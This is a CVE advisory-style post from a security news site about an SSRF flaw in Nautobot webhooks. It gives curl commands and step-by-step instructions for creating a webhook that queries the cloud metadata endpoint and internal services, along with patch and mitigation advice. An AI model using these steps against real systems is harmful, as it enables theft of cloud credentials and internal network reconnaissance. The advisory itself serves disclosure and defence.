Listen to this Post
CVE-2026-44797 describes a server-side request forgery (SSRF) vulnerability in Nautobot, a Network Source of Truth and Automation Platform. The flaw resides in the Webhook data model and its associated feature set. Users with sufficient privileges can configure webhooks that send HTTP requests to arbitrary hosts and IP addresses. Normally, webhooks should be restricted to predefined, trusted endpoints. However, affected versions lack proper validation of the target URL. An attacker can set a webhook destination to an internal IP, localhost, or cloud metadata service. This allows the Nautobot server to make unintended outbound requests. The behavior mimics classic SSRF attacks. For example, an attacker could probe internal network topology. They could also access internal APIs that are not exposed to the internet. In cloud environments, the instance metadata endpoint (169.254.169.254) could be queried. This might leak IAM credentials or sensitive configuration data. Additionally, the attacker could scan internal ports or interact with internal services like Redis, databases, or orchestration tools. The vulnerability exists because the webhook execution engine does not filter or block private IP ranges. No allowlist or denylist is enforced on the webhook URL field. Thus, a user with permissions to create or modify webhooks can inject malicious destinations. The attack requires authenticated access, but not admin rights—any role that can manage webhooks triggers the flaw. Versions prior to 2.4.33 and 3.1.2 are vulnerable. The fix introduces URL validation and network boundary checks. Patched versions reject requests to loopback, link-local, and private IP ranges by default. Administrators can optionally configure allowlists for legitimate internal webhooks. The CVE was published on May 28, 2026, with patches released the same week.
DailyCVE Form:
Platform: Nautobot
Version: prior 2.4.33/3.1.2
Vulnerability: SSRF via Webhook
Severity: High
date: 2026-05-28
Prediction: Patched in 2.4.33
What Undercode Say:
Analytics:
Check Nautobot version
nautobot-server --version
List existing webhooks (requires API token)
curl -H "Authorization: Token <token>" http://nautobot.local/api/extras/webhooks/
Create malicious webhook via API
curl -X POST http://nautobot.local/api/extras/webhooks/ \
-H "Authorization: Token <token>" \
-H "Content-Type: application/json" \
-d '{
"name": "SSRF-test",
"type_create": true,
"payload_url": "http://169.254.169.254/latest/meta-data/",
"enabled": true
}'
Trigger webhook by creating a dummy object
curl -X POST http://nautobot.local/api/dcim/sites/ \
-H "Authorization: Token <token>" \
-H "Content-Type: application/json" \
-d '{"name": "test-site", "slug": "test-site"}'
Observe internal server logs for outgoing request
tail -f /var/log/nautobot/nautobot.log | grep "GET http://169.254.169.254"
Exploit:
- Authenticate to Nautobot with a user that has `extras.add_webhook` or `extras.change_webhook` permission.
- Create or edit a webhook, setting `payload_url` to an internal target (e.g., `http://192.168.1.1:8080/admin`, `http://localhost:6379/INFO`, `http://169.254.169.254/latest/user-data`).
- Set any trigger event (e.g., `type_create` on a low-privilege model like Site or Device).
- Perform an action that triggers the webhook (create/update a matching object).
- Nautobot server sends an HTTP request from its internal network context to the attacker-specified URL.
- Capture response data or observe side effects (e.g., port scan timing, metadata extraction).
Protection:
- Upgrade to Nautobot 2.4.33 or 3.1.2 immediately.
- If upgrade not possible, restrict webhook creation to superusers via role-based access control.
- Block outbound traffic from Nautobot server to RFC1918 addresses using egress firewall rules.
- Set environment variable `NAUTOBOT_WEBHOOKS_ALLOW_PRIVATE_NETWORKS=False` (patch backport).
- Regularly audit existing webhooks for suspicious `payload_url` values.
Impact:
- Internal network reconnaissance and port scanning.
- Theft of cloud instance metadata (IAM keys, scripts, tokens).
- Access to unauthenticated internal services (e.g., Redis, Consul, Kubernetes API).
- Bypass of network segmentation and firewall restrictions.
- Potential remote code execution if internal service is vulnerable (e.g., Jenkins, Hadoop).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

